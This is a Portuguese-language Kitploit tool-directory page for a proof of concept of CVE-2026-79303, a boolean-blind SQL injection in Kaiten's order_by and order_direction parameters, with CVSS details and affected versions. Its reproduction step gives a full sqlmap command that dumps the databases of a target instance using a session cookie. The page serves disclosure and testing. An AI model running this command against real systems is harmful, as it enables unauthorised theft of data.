Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-79303 — Prova de conceito para CVE-2026-79303, uma injeção SQL boolean-blind crítica no Kaiten que afeta os parâmetros order_by e order_direction, com etapas de reprodução e detalhes de CVSS 9.9. | Kitploit
Ferramentas/GitHubGitHub/4ybrick/cve-2026-79303
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

Prova de conceito para CVE-2026-79303, uma injeção SQL boolean-blind crítica no Kaiten que afeta os parâmetros order_by e order_direction, com etapas de reprodução e detalhes de CVSS 9.9.

Ver Repositório
há 20h 23mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-79303

Injeção SQL cega booleana

Descrição: Instruções SQL dinâmicas são geradas sem a validação de dados necessária e sem usar instruções parametrizadas ou procedimentos armazenados.

Impacto: SQLi

Vetor CVSSv3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Crítico)

CWE: CWE-89: Neutralização inadequada de Elementos Especiais usados em um Comando SQL ('Injeção SQL')

Componente Afetado: Parâmetros GET order_by e order_direction

Fornecedor: kaiten

Produto Afetado

  • Versões do kaiten: 57.192.20 < 57.214.26

Passos para reproduzir:

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. Digite n (não mesclar seu cookie com um novo) -> C
Уязвимый параметр

Descobridor

  • Danil Belov

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
Baixar ferramenta